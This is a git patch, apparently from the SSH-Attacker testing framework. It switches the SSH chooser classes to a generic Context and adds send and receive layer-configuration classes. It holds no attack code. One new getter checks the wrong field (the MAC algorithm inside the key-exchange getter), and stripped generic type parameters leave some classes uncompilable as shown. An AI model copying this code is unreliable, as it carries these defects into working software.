a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/ChooserFactory.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/ChooserFactory.java index 7f3ae7bfb..ab3ab08dd 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/ChooserFactory.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/ChooserFactory.java @@ -10,10 +10,10 @@ import de.rub.nds.sshattacker.core.config.Config; import de.rub.nds.sshattacker.core.constants.ChooserType; import de.rub.nds.sshattacker.core.exceptions.InvalidChooserTypeException; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.state.Context; public class ChooserFactory { - public static Chooser getChooser(ChooserType type, SshContext context, Config config) { + public static Chooser getChooser(ChooserType type, Context context, Config config) { if (type == ChooserType.DEFAULT) { return new DefaultChooser(context, config); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/DefaultChooser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/DefaultChooser.java index 995b07e16..117485af3 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/DefaultChooser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/DefaultChooser.java @@ -15,7 +15,9 @@ import de.rub.nds.sshattacker.core.crypto.kex.RsaKeyExchange; import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; import de.rub.nds.sshattacker.core.protocol.util.AlgorithmPicker; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.state.Context; +import de.rub.nds.tlsattacker.transport.Connection; +import de.rub.nds.tlsattacker.transport.ConnectionEndType; import java.util.Arrays; import java.util.List; import java.util.Map; @@ -39,7 +41,7 @@ public class DefaultChooser extends Chooser { * @param context Context of the SSH connection * @param config Configuration of the SSH-Attacker */ - public DefaultChooser(SshContext context, Config config) { + public DefaultChooser(Context context, Config config) { super(context, config); } @@ -53,7 +55,17 @@ public DefaultChooser(SshContext context, Config config) { */ @Override public String getClientVersion() { - return context.getClientVersion().orElse(config.getClientVersion()); + return context.getSshContext().getClientVersion().orElse(config.getClientVersion()); + } + + @Override + public ConnectionEndType getConnectionEndType() { + return getConnection().getLocalConnectionEndType(); + } + + @Override + public Connection getConnection() { + return context.getConnection(); } /** @@ -65,7 +77,7 @@ public String getClientVersion() { */ @Override public String getClientComment() { - return context.getClientComment().orElse(config.getClientComment()); + return context.getSshContext().getClientComment().orElse(config.getClientComment()); } /** @@ -77,7 +89,8 @@ public String getClientComment() { */ @Override public String getClientEndOfMessageSequence() { - return context.getClientEndOfMessageSequence() + return context.getSshContext() + .getClientEndOfMessageSequence() .orElse(config.getClientEndOfMessageSequence()); } @@ -90,7 +103,7 @@ public String getClientEndOfMessageSequence() { */ @Override public String getServerVersion() { - return context.getServerVersion().orElse(config.getServerVersion()); + return context.getSshContext().getServerVersion().orElse(config.getServerVersion()); } /** @@ -102,7 +115,7 @@ public String getServerVersion() { */ @Override public String getServerComment() { - return context.getServerComment().orElse(config.getServerComment()); + return context.getSshContext().getServerComment().orElse(config.getServerComment()); } /** @@ -114,7 +127,8 @@ public String getServerComment() { */ @Override public String getServerEndOfMessageSequence() { - return context.getServerEndOfMessageSequence() + return context.getSshContext() + .getServerEndOfMessageSequence() .orElse(config.getServerEndOfMessageSequence()); } // endregion @@ -129,7 +143,7 @@ public String getServerEndOfMessageSequence() { */ @Override public byte[] getClientCookie() { - return context.getClientCookie().orElse(config.getClientCookie()); + return context.getSshContext().getClientCookie().orElse(config.getClientCookie()); } /** @@ -141,7 +155,7 @@ public byte[] getClientCookie() { */ @Override public byte[] getServerCookie() { - return context.getServerCookie().orElse(config.getServerCookie()); + return context.getSshContext().getServerCookie().orElse(config.getServerCookie()); } /** @@ -153,7 +167,8 @@ public byte[] getServerCookie() { */ @Override public List getClientSupportedKeyExchangeAlgorithms() { - return context.getClientSupportedKeyExchangeAlgorithms() + return context.getSshContext() + .getClientSupportedKeyExchangeAlgorithms() .orElse(config.getClientSupportedKeyExchangeAlgorithms()); } @@ -166,7 +181,8 @@ public List getClientSupportedKeyExchangeAlgorithms() { */ @Override public List getServerSupportedKeyExchangeAlgorithms() { - return context.getServerSupportedKeyExchangeAlgorithms() + return context.getSshContext() + .getServerSupportedKeyExchangeAlgorithms() .orElse(config.getServerSupportedKeyExchangeAlgorithms()); } @@ -179,7 +195,8 @@ public List getServerSupportedKeyExchangeAlgorithms() { */ @Override public List getClientSupportedHostKeyAlgorithms() { - return context.getClientSupportedHostKeyAlgorithms() + return context.getSshContext() + .getClientSupportedHostKeyAlgorithms() .orElse(config.getClientSupportedHostKeyAlgorithms()); } @@ -192,7 +209,8 @@ public List getClientSupportedHostKeyAlgorithms() { */ @Override public List getServerSupportedHostKeyAlgorithms() { - return context.getServerSupportedHostKeyAlgorithms() + return context.getSshContext() + .getServerSupportedHostKeyAlgorithms() .orElse(config.getServerSupportedHostKeyAlgorithms()); } @@ -207,7 +225,8 @@ public List getServerSupportedHostKeyAlgorithms() { */ @Override public List getClientSupportedEncryptionAlgorithmsClientToServer() { - return context.getClientSupportedEncryptionAlgorithmsClientToServer() + return context.getSshContext() + .getClientSupportedEncryptionAlgorithmsClientToServer() .orElse(config.getClientSupportedEncryptionAlgorithmsClientToServer()); } @@ -222,7 +241,8 @@ public List getClientSupportedEncryptionAlgorithmsClientToS */ @Override public List getClientSupportedEncryptionAlgorithmsServerToClient() { - return context.getClientSupportedEncryptionAlgorithmsServerToClient() + return context.getSshContext() + .getClientSupportedEncryptionAlgorithmsServerToClient() .orElse(config.getClientSupportedEncryptionAlgorithmsServerToClient()); } @@ -237,7 +257,8 @@ public List getClientSupportedEncryptionAlgorithmsServerToC */ @Override public List getServerSupportedEncryptionAlgorithmsServerToClient() { - return context.getServerSupportedEncryptionAlgorithmsServerToClient() + return context.getSshContext() + .getServerSupportedEncryptionAlgorithmsServerToClient() .orElse(config.getServerSupportedEncryptionAlgorithmsServerToClient()); } @@ -252,7 +273,8 @@ public List getServerSupportedEncryptionAlgorithmsServerToC */ @Override public List getServerSupportedEncryptionAlgorithmsClientToServer() { - return context.getServerSupportedEncryptionAlgorithmsClientToServer() + return context.getSshContext() + .getServerSupportedEncryptionAlgorithmsClientToServer() .orElse(config.getServerSupportedEncryptionAlgorithmsClientToServer()); } @@ -266,7 +288,8 @@ public List getServerSupportedEncryptionAlgorithmsClientToS */ @Override public List getClientSupportedMacAlgorithmsClientToServer() { - return context.getClientSupportedMacAlgorithmsClientToServer() + return context.getSshContext() + .getClientSupportedMacAlgorithmsClientToServer() .orElse(config.getClientSupportedMacAlgorithmsClientToServer()); } @@ -280,7 +303,8 @@ public List getClientSupportedMacAlgorithmsClientToServer() { */ @Override public List getClientSupportedMacAlgorithmsServerToClient() { - return context.getClientSupportedMacAlgorithmsServerToClient() + return context.getSshContext() + .getClientSupportedMacAlgorithmsServerToClient() .orElse(config.getClientSupportedMacAlgorithmsServerToClient()); } @@ -294,7 +318,8 @@ public List getClientSupportedMacAlgorithmsServerToClient() { */ @Override public List getServerSupportedMacAlgorithmsServerToClient() { - return context.getServerSupportedMacAlgorithmsServerToClient() + return context.getSshContext() + .getServerSupportedMacAlgorithmsServerToClient() .orElse(config.getServerSupportedMacAlgorithmsServerToClient()); } @@ -308,7 +333,8 @@ public List getServerSupportedMacAlgorithmsServerToClient() { */ @Override public List getServerSupportedMacAlgorithmsClientToServer() { - return context.getServerSupportedMacAlgorithmsClientToServer() + return context.getSshContext() + .getServerSupportedMacAlgorithmsClientToServer() .orElse(config.getServerSupportedMacAlgorithmsClientToServer()); } @@ -323,7 +349,8 @@ public List getServerSupportedMacAlgorithmsClientToServer() { */ @Override public List getClientSupportedCompressionMethodsClientToServer() { - return context.getClientSupportedCompressionMethodsClientToServer() + return context.getSshContext() + .getClientSupportedCompressionMethodsClientToServer() .orElse(config.getClientSupportedCompressionMethodsClientToServer()); } @@ -338,7 +365,8 @@ public List getClientSupportedCompressionMethodsClientToServe */ @Override public List getClientSupportedCompressionMethodsServerToClient() { - return context.getClientSupportedCompressionMethodsServerToClient() + return context.getSshContext() + .getClientSupportedCompressionMethodsServerToClient() .orElse(config.getClientSupportedCompressionMethodsServerToClient()); } @@ -353,7 +381,8 @@ public List getClientSupportedCompressionMethodsServerToClien */ @Override public List getServerSupportedCompressionMethodsServerToClient() { - return context.getServerSupportedCompressionMethodsServerToClient() + return context.getSshContext() + .getServerSupportedCompressionMethodsServerToClient() .orElse(config.getServerSupportedCompressionMethodsServerToClient()); } @@ -368,7 +397,8 @@ public List getServerSupportedCompressionMethodsServerToClien */ @Override public List getServerSupportedCompressionMethodsClientToServer() { - return context.getServerSupportedCompressionMethodsClientToServer() + return context.getSshContext() + .getServerSupportedCompressionMethodsClientToServer() .orElse(config.getServerSupportedCompressionMethodsClientToServer()); } @@ -382,7 +412,8 @@ public List getServerSupportedCompressionMethodsClientToServe */ @Override public List getClientSupportedLanguagesClientToServer() { - return context.getClientSupportedLanguagesClientToServer() + return context.getSshContext() + .getClientSupportedLanguagesClientToServer() .orElse(config.getClientSupportedLanguagesClientToServer()); } @@ -396,7 +427,8 @@ public List getClientSupportedLanguagesClientToServer() { */ @Override public List getClientSupportedLanguagesServerToClient() { - return context.getClientSupportedLanguagesServerToClient() + return context.getSshContext() + .getClientSupportedLanguagesServerToClient() .orElse(config.getClientSupportedLanguagesServerToClient()); } @@ -410,7 +442,8 @@ public List getClientSupportedLanguagesServerToClient() { */ @Override public List getServerSupportedLanguagesServerToClient() { - return context.getServerSupportedLanguagesServerToClient() + return context.getSshContext() + .getServerSupportedLanguagesServerToClient() .orElse(config.getServerSupportedLanguagesServerToClient()); } @@ -424,7 +457,8 @@ public List getServerSupportedLanguagesServerToClient() { */ @Override public List getServerSupportedLanguagesClientToServer() { - return context.getServerSupportedLanguagesClientToServer() + return context.getSshContext() + .getServerSupportedLanguagesClientToServer() .orElse(config.getServerSupportedLanguagesClientToServer()); } @@ -439,7 +473,8 @@ public List getServerSupportedLanguagesClientToServer() { */ @Override public boolean getClientFirstKeyExchangePacketFollows() { - return context.getClientFirstKeyExchangePacketFollows() + return context.getSshContext() + .getClientFirstKeyExchangePacketFollows() .orElse(config.getClientFirstKeyExchangePacketFollows()); } @@ -454,7 +489,8 @@ public boolean getClientFirstKeyExchangePacketFollows() { */ @Override public boolean getServerFirstKeyExchangePacketFollows() { - return context.getServerFirstKeyExchangePacketFollows() + return context.getSshContext() + .getServerFirstKeyExchangePacketFollows() .orElse(config.getServerFirstKeyExchangePacketFollows()); } @@ -467,7 +503,7 @@ public boolean getServerFirstKeyExchangePacketFollows() { */ @Override public int getClientReserved() { - return context.getClientReserved().orElse(config.getClientReserved()); + return context.getSshContext().getClientReserved().orElse(config.getClientReserved()); } /** @@ -479,7 +515,7 @@ public int getClientReserved() { */ @Override public int getServerReserved() { - return context.getServerReserved().orElse(config.getServerReserved()); + return context.getSshContext().getServerReserved().orElse(config.getServerReserved()); } // endregion @@ -495,7 +531,8 @@ public int getServerReserved() { */ @Override public KeyExchangeAlgorithm getKeyExchangeAlgorithm() { - return context.getKeyExchangeAlgorithm() + return context.getSshContext() + .getKeyExchangeAlgorithm() .orElseGet( () -> { KeyExchangeAlgorithm negotiatedAlgorithm = @@ -503,7 +540,7 @@ public KeyExchangeAlgorithm getKeyExchangeAlgorithm() { this.getClientSupportedKeyExchangeAlgorithms(), this.getServerSupportedKeyExchangeAlgorithms()) .orElse( - context.isClient() + context.getSshContext().isClient() ? this .getClientSupportedKeyExchangeAlgorithms() .get(0) @@ -514,7 +551,7 @@ public KeyExchangeAlgorithm getKeyExchangeAlgorithm() { // considered // useful or disadvantageous (same for all negotiated algorithm // methods) - context.setKeyExchangeAlgorithm(negotiatedAlgorithm); + context.getSshContext().setKeyExchangeAlgorithm(negotiatedAlgorithm); return negotiatedAlgorithm; }); } @@ -530,7 +567,8 @@ public KeyExchangeAlgorithm getKeyExchangeAlgorithm() { */ @Override public PublicKeyAlgorithm getHostKeyAlgorithm() { - return context.getHostKeyAlgorithm() + return context.getSshContext() + .getHostKeyAlgorithm() .orElseGet( () -> { PublicKeyAlgorithm negotiatedAlgorithm = @@ -538,14 +576,14 @@ public PublicKeyAlgorithm getHostKeyAlgorithm() { this.getClientSupportedHostKeyAlgorithms(), this.getServerSupportedHostKeyAlgorithms()) .orElse( - context.isClient() + context.getSshContext().isClient() ? this .getClientSupportedHostKeyAlgorithms() .get(0) : this .getServerSupportedHostKeyAlgorithms() .get(0)); - context.setHostKeyAlgorithm(negotiatedAlgorithm); + context.getSshContext().setHostKeyAlgorithm(negotiatedAlgorithm); return negotiatedAlgorithm; }); } @@ -561,7 +599,8 @@ public PublicKeyAlgorithm getHostKeyAlgorithm() { */ @Override public EncryptionAlgorithm getEncryptionAlgorithmClientToServer() { - return context.getEncryptionAlgorithmClientToServer() + return context.getSshContext() + .getEncryptionAlgorithmClientToServer() .orElseGet( () -> { EncryptionAlgorithm negotiatedAlgorithm = @@ -571,14 +610,15 @@ public EncryptionAlgorithm getEncryptionAlgorithmClientToServer() { this .getServerSupportedEncryptionAlgorithmsClientToServer()) .orElse( - context.isClient() + context.getSshContext().isClient() ? this .getClientSupportedEncryptionAlgorithmsClientToServer() .get(0) : this .getServerSupportedEncryptionAlgorithmsClientToServer() .get(0)); - context.setEncryptionAlgorithmClientToServer(negotiatedAlgorithm); + context.getSshContext() + .setEncryptionAlgorithmClientToServer(negotiatedAlgorithm); return negotiatedAlgorithm; }); } @@ -594,7 +634,8 @@ public EncryptionAlgorithm getEncryptionAlgorithmClientToServer() { */ @Override public EncryptionAlgorithm getEncryptionAlgorithmServerToClient() { - return context.getEncryptionAlgorithmServerToClient() + return context.getSshContext() + .getEncryptionAlgorithmServerToClient() .orElseGet( () -> { EncryptionAlgorithm negotiatedAlgorithm = @@ -604,14 +645,15 @@ public EncryptionAlgorithm getEncryptionAlgorithmServerToClient() { this .getServerSupportedEncryptionAlgorithmsServerToClient()) .orElse( - context.isClient() + context.getSshContext().isClient() ? this .getClientSupportedEncryptionAlgorithmsServerToClient() .get(0) : this .getServerSupportedEncryptionAlgorithmsServerToClient() .get(0)); - context.setEncryptionAlgorithmServerToClient(negotiatedAlgorithm); + context.getSshContext() + .setEncryptionAlgorithmServerToClient(negotiatedAlgorithm); return negotiatedAlgorithm; }); } @@ -627,7 +669,8 @@ public EncryptionAlgorithm getEncryptionAlgorithmServerToClient() { */ @Override public MacAlgorithm getMacAlgorithmClientToServer() { - return context.getMacAlgorithmClientToServer() + return context.getSshContext() + .getMacAlgorithmClientToServer() .orElseGet( () -> { MacAlgorithm negotiatedAlgorithm = @@ -637,14 +680,15 @@ public MacAlgorithm getMacAlgorithmClientToServer() { this .getServerSupportedMacAlgorithmsClientToServer()) .orElse( - context.isClient() + context.getSshContext().isClient() ? this .getClientSupportedMacAlgorithmsClientToServer() .get(0) : this .getServerSupportedMacAlgorithmsClientToServer() .get(0)); - context.setMacAlgorithmClientToServer(negotiatedAlgorithm); + context.getSshContext() + .setMacAlgorithmClientToServer(negotiatedAlgorithm); return negotiatedAlgorithm; }); } @@ -660,7 +704,8 @@ public MacAlgorithm getMacAlgorithmClientToServer() { */ @Override public MacAlgorithm getMacAlgorithmServerToClient() { - return context.getMacAlgorithmServerToClient() + return context.getSshContext() + .getMacAlgorithmServerToClient() .orElseGet( () -> { MacAlgorithm negotiatedAlgorithm = @@ -670,14 +715,15 @@ public MacAlgorithm getMacAlgorithmServerToClient() { this .getServerSupportedMacAlgorithmsServerToClient()) .orElse( - context.isClient() + context.getSshContext().isClient() ? this .getClientSupportedMacAlgorithmsServerToClient() .get(0) : this .getServerSupportedMacAlgorithmsServerToClient() .get(0)); - context.setMacAlgorithmServerToClient(negotiatedAlgorithm); + context.getSshContext() + .setMacAlgorithmServerToClient(negotiatedAlgorithm); return negotiatedAlgorithm; }); } @@ -693,7 +739,8 @@ public MacAlgorithm getMacAlgorithmServerToClient() { */ @Override public CompressionMethod getCompressionMethodClientToServer() { - return context.getCompressionMethodClientToServer() + return context.getSshContext() + .getCompressionMethodClientToServer() .orElseGet( () -> { CompressionMethod negotiatedMethod = @@ -703,14 +750,15 @@ public CompressionMethod getCompressionMethodClientToServer() { this .getServerSupportedCompressionMethodsClientToServer()) .orElse( - context.isClient() + context.getSshContext().isClient() ? this .getClientSupportedCompressionMethodsClientToServer() .get(0) : this .getServerSupportedCompressionMethodsClientToServer() .get(0)); - context.setCompressionMethodClientToServer(negotiatedMethod); + context.getSshContext() + .setCompressionMethodClientToServer(negotiatedMethod); return negotiatedMethod; }); } @@ -726,7 +774,8 @@ public CompressionMethod getCompressionMethodClientToServer() { */ @Override public CompressionMethod getCompressionMethodServerToClient() { - return context.getCompressionMethodServerToClient() + return context.getSshContext() + .getCompressionMethodServerToClient() .orElseGet( () -> { CompressionMethod negotiatedMethod = @@ -736,14 +785,15 @@ public CompressionMethod getCompressionMethodServerToClient() { this .getServerSupportedCompressionMethodsServerToClient()) .orElse( - context.isClient() + context.getSshContext().isClient() ? this .getClientSupportedCompressionMethodsServerToClient() .get(0) : this .getServerSupportedCompressionMethodsServerToClient() .get(0)); - context.setCompressionMethodServerToClient(negotiatedMethod); + context.getSshContext() + .setCompressionMethodServerToClient(negotiatedMethod); return negotiatedMethod; }); } @@ -759,14 +809,16 @@ public CompressionMethod getCompressionMethodServerToClient() { */ @Override public DhKeyExchange getDhKeyExchange() { - return context.getDhKeyExchangeInstance() + return context.getSshContext() + .getDhKeyExchangeInstance() .orElseGet( () -> { KeyExchangeAlgorithm negotiatedAlgorithm = this.getKeyExchangeAlgorithm(); DhKeyExchange freshKeyExchange = - DhKeyExchange.newInstance(context, negotiatedAlgorithm); - context.setDhKeyExchangeInstance(freshKeyExchange); + DhKeyExchange.newInstance( + context.getSshContext(), negotiatedAlgorithm); + context.getSshContext().setDhKeyExchangeInstance(freshKeyExchange); return freshKeyExchange; }); } @@ -780,14 +832,16 @@ public DhKeyExchange getDhKeyExchange() { */ @Override public DhKeyExchange getDhGexKeyExchange() { - return context.getDhGexKeyExchangeInstance() + return context.getSshContext() + .getDhGexKeyExchangeInstance() .orElseGet( () -> { KeyExchangeAlgorithm negotiatedAlgorithm = this.getKeyExchangeAlgorithm(); DhKeyExchange freshKeyExchange = - DhKeyExchange.newInstance(context, negotiatedAlgorithm); - context.setDhGexKeyExchangeInstance(freshKeyExchange); + DhKeyExchange.newInstance( + context.getSshContext(), negotiatedAlgorithm); + context.getSshContext().setDhGexKeyExchangeInstance(freshKeyExchange); return freshKeyExchange; }); } @@ -795,14 +849,16 @@ public DhKeyExchange getDhGexKeyExchange() { /** */ @Override public HybridKeyExchange getHybridKeyExchange() { - return context.getHybridKeyExchangeInstance() + return context.getSshContext() + .getHybridKeyExchangeInstance() .orElseGet( () -> { KeyExchangeAlgorithm negotiatedAlgorithm = this.getKeyExchangeAlgorithm(); HybridKeyExchange hybridKeyExchange = - HybridKeyExchange.newInstance(context, negotiatedAlgorithm); - context.setHybridKeyExchangeInstance(hybridKeyExchange); + HybridKeyExchange.newInstance( + context.getSshContext(), negotiatedAlgorithm); + context.getSshContext().setHybridKeyExchangeInstance(hybridKeyExchange); return hybridKeyExchange; }); } @@ -816,15 +872,16 @@ public HybridKeyExchange getHybridKeyExchange() { */ @Override public AbstractEcdhKeyExchange getEcdhKeyExchange() { - return context.getEcdhKeyExchangeInstance() + return context.getSshContext() + .getEcdhKeyExchangeInstance() .orElseGet( () -> { KeyExchangeAlgorithm negotiatedAlgorithm = this.getKeyExchangeAlgorithm(); AbstractEcdhKeyExchange freshKeyExchange = AbstractEcdhKeyExchange.newInstance( - context, negotiatedAlgorithm); - context.setEcdhKeyExchangeInstance(freshKeyExchange); + context.getSshContext(), negotiatedAlgorithm); + context.getSshContext().setEcdhKeyExchangeInstance(freshKeyExchange); return freshKeyExchange; }); } @@ -838,17 +895,19 @@ public AbstractEcdhKeyExchange getEcdhKeyExchange() { */ @Override public RsaKeyExchange getRsaKeyExchange() { - return context.getRsaKeyExchangeInstance() + return context.getSshContext() + .getRsaKeyExchangeInstance() .orElseGet( () -> { KeyExchangeAlgorithm negotiatedAlgorithm = this.getKeyExchangeAlgorithm(); RsaKeyExchange freshKeyExchange = - RsaKeyExchange.newInstance(context, negotiatedAlgorithm); + RsaKeyExchange.newInstance( + context.getSshContext(), negotiatedAlgorithm); // Set transient key to ensure its presence freshKeyExchange.setTransientKey( config.getFallbackRsaTransientPublicKey()); - context.setRsaKeyExchangeInstance(freshKeyExchange); + context.getSshContext().setRsaKeyExchangeInstance(freshKeyExchange); return freshKeyExchange; }); } @@ -864,7 +923,8 @@ public RsaKeyExchange getRsaKeyExchange() { */ @Override public SshPublicKey getNegotiatedHostKey() { - Optional negotiatedHostKeyAlgorithm = context.getHostKeyAlgorithm(); + Optional negotiatedHostKeyAlgorithm = + context.getSshContext().getHostKeyAlgorithm(); SshPublicKey fallback = config.getHostKeys().get(0); if (negotiatedHostKeyAlgorithm.isEmpty()) { LOGGER.warn( @@ -926,7 +986,9 @@ public RsaKeyExchange getRsaKeyExchange() { */ @Override public Integer getMinimalDhGroupSize() { - return context.getMinimalDhGroupSize().orElse(config.getDhGexMinimalGroupSize()); + return context.getSshContext() + .getMinimalDhGroupSize() + .orElse(config.getDhGexMinimalGroupSize()); } /** @@ -936,7 +998,9 @@ public Integer getMinimalDhGroupSize() { */ @Override public Integer getPreferredDhGroupSize() { - return context.getPreferredDhGroupSize().orElse(config.getDhGexPreferredGroupSize()); + return context.getSshContext() + .getPreferredDhGroupSize() + .orElse(config.getDhGexPreferredGroupSize()); } /** @@ -946,7 +1010,9 @@ public Integer getPreferredDhGroupSize() { */ @Override public Integer getMaximalDhGroupSize() { - return context.getMaximalDhGroupSize().orElse(config.getDhGexMaximalGroupSize()); + return context.getSshContext() + .getMaximalDhGroupSize() + .orElse(config.getDhGexMaximalGroupSize()); } // endregion @@ -961,4 +1027,36 @@ public Integer getMaximalDhGroupSize() { public AuthenticationMethod getAuthenticationMethod() { return config.getAuthenticationMethod(); } + + public CompressionAlgorithm getSelectedCompressionAlgorithm() { + if (context.getSshContext().getSelectedCompressionAlgorithm() != null) { + return context.getSshContext().getSelectedCompressionAlgorithm(); + } else { + return config.getDefaultSelectedCompressionAlgorithm(); + } + } + + public EncryptionAlgorithm getSelectedEncryptionAlgorithm() { + if (context.getSshContext().getSelectedEncryptionAlgorithm() != null) { + return context.getSshContext().getSelectedEncryptionAlgorithm(); + } else { + return config.getDefaultSelectedEncryptionAlgorithm(); + } + } + + public MacAlgorithm getSelectedMacAlgorithm() { + if (context.getSshContext().getSelectedMacAlgorithm() != null) { + return context.getSshContext().getSelectedMacAlgorithm(); + } else { + return config.getDefaultSelectedMacAlgorithm(); + } + } + + public KeyExchangeAlgorithm getSelectedKeyExchangeAlgorithm() { + if (context.getSshContext().getSelectedMacAlgorithm() != null) { + return context.getSshContext().getSelectedKeyExchangeAlgorithm(); + } else { + return config.getDefaultSelectedKeyExchangeAlgorithm(); + } + } } From cee4d216d9a3a8ec227834e71983b67c60dcaea1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Steffen=20Bro=C3=9Fler?= Date: Mon, 29 May 2023 14:22:11 +0200 Subject: [PATCH 002/176] Adding correct Send and Recive messages --- .../core/layer/DataContainerFilter.java | 18 ++ .../SpecificReceiveLayerConfiguration.java | 130 +++++++++++++ .../layer/SpecificSendLayerConfiguration.java | 47 +++++ .../layer/constant/ImplementedLayers.java | 1 + .../core/workflow/action/MessageAction.java | 182 ++++++++++++++++-- .../core/workflow/action/ReceiveAction.java | 7 +- .../core/workflow/action/SendAction.java | 13 ++ .../core/workflow/action/SshAction.java | 53 ++++- 8 files changed, 434 insertions(+), 17 deletions(-) create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/DataContainerFilter.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/SpecificReceiveLayerConfiguration.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/SpecificSendLayerConfiguration.java diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/DataContainerFilter.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/DataContainerFilter.java new file mode 100644 index 000000000..2cee75a5a --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/DataContainerFilter.java @@ -0,0 +1,18 @@ +/** + * TLS-Attacker - A Modular Penetration Testing Framework for TLS + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, Hackmanit GmbH + * + * Licensed under Apache License, Version 2.0 + * http://www.apache.org/licenses/LICENSE-2.0.txt + */ + +package de.rub.nds.sshattacker.core.layer; + +import de.rub.nds.sshattacker.core.layer.data.DataContainer; + +public abstract class DataContainerFilter { + + public abstract boolean filterApplies(DataContainer container); + +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/SpecificReceiveLayerConfiguration.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/SpecificReceiveLayerConfiguration.java new file mode 100644 index 000000000..1e0afd982 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/SpecificReceiveLayerConfiguration.java @@ -0,0 +1,130 @@ +/* + * TLS-Attacker - A Modular Penetration Testing Framework for TLS + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License, Version 2.0 + * http://www.apache.org/licenses/LICENSE-2.0.txt + */ +package de.rub.nds.sshattacker.core.layer; + +import de.rub.nds.sshattacker.core.layer.constant.LayerType; +import de.rub.nds.sshattacker.core.layer.data.DataContainer; + +import java.util.Arrays; +import java.util.List; + +/** + * ReceiveConfiguration that receives a specific list of DataContainers. Any additional received + * containers are marked as such. + */ +public class SpecificReceiveLayerConfiguration + extends ReceiveLayerConfiguration { + + private List containerFilterList; + + private boolean allowTrailingContainers = false; + + public SpecificReceiveLayerConfiguration(LayerType layerType, List containerList) { + super(layerType, containerList); + } + + public SpecificReceiveLayerConfiguration(LayerType layerType, Container... containers) { + super(layerType, containers); + } + + @Override + public boolean executedAsPlanned(List list) { + return evaluateReceivedContainers(list, false); + } + + /** + * Compares the received DataContainers to the list of expected DataContainers. An expected + * DataContainer may be skipped if it is not marked as required. An unexpected DataContainer may + * be ignored if a DataContainerFilter applies. + * + * @param list The list of DataContainers + * @param mayReceiveMoreContainers Determines if an incomplete result is acceptable. This is the + * case if no contradictory DataContainer has been received yet and the LayerConfiguration + * can be satisfied if additional DataContainers get provided + */ + private boolean evaluateReceivedContainers( + List list, boolean mayReceiveMoreContainers) { + if (list == null) { + return false; + } + int j = 0; + List expectedContainers = getContainerList(); + if (expectedContainers != null) { + for (int i = 0; i < expectedContainers.size(); i++) { + if (j >= list.size() && expectedContainers.get(i).isRequired()) { + return mayReceiveMoreContainers; + } else if (j < list.size()) { + if (!expectedContainers.get(i).getClass().equals(list.get(j).getClass()) + && expectedContainers.get(i).isRequired()) { + if (containerCanBeFiltered(list.get(j))) { + j++; + i--; + } else { + return false; + } + + } else if (expectedContainers + .get(i) + .getClass() + .equals(list.get(j).getClass())) { + j++; + } + } + } + + for (; j < list.size(); j++) { + if (!containerCanBeFiltered(list.get(j)) && !isAllowTrailingContainers()) { + return false; + } + } + } + return true; + } + + @Override + public boolean failedEarly(List list) { + return !evaluateReceivedContainers(list, true); + } + + public void setContainerFilterList(DataContainerFilter... containerFilters) { + this.setContainerFilterList(Arrays.asList(containerFilters)); + } + + public boolean containerCanBeFiltered(Container container) { + if (getContainerFilterList() != null) { + for (DataContainerFilter containerFilter : getContainerFilterList()) { + if (containerFilter.filterApplies(container)) { + return true; + } + } + } + return false; + } + + public boolean isAllowTrailingContainers() { + return allowTrailingContainers; + } + + public void setAllowTrailingContainers(boolean allowTrailingContainers) { + this.allowTrailingContainers = allowTrailingContainers; + } + + public List getContainerFilterList() { + return containerFilterList; + } + + public void setContainerFilterList(List containerFilterList) { + this.containerFilterList = containerFilterList; + } + + @Override + public boolean isProcessTrailingContainers() { + return true; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/SpecificSendLayerConfiguration.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/SpecificSendLayerConfiguration.java new file mode 100644 index 000000000..52050a975 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/SpecificSendLayerConfiguration.java @@ -0,0 +1,47 @@ +/* + * TLS-Attacker - A Modular Penetration Testing Framework for TLS + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License, Version 2.0 + * http://www.apache.org/licenses/LICENSE-2.0.txt + */ +package de.rub.nds.sshattacker.core.layer; + +import de.rub.nds.sshattacker.core.layer.constant.LayerType; +import de.rub.nds.sshattacker.core.layer.data.DataContainer; + +import java.util.List; + +/** + * Send configuration that sends a list of containers to the recipient. + * + * @param + */ +public class SpecificSendLayerConfiguration + extends LayerConfiguration { + + public SpecificSendLayerConfiguration(LayerType layerType, List containerList) { + super(layerType, containerList); + } + + public SpecificSendLayerConfiguration(LayerType layerType, Container... containers) { + super(layerType, containers); + } + + @Override + public boolean executedAsPlanned(List list) { + if (list == null) { + return false; + } + if (getContainerList() == null) { + return true; + } + return list.size() == getContainerList().size(); + } + + @Override + public boolean failedEarly(List list) { + return false; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/constant/ImplementedLayers.java 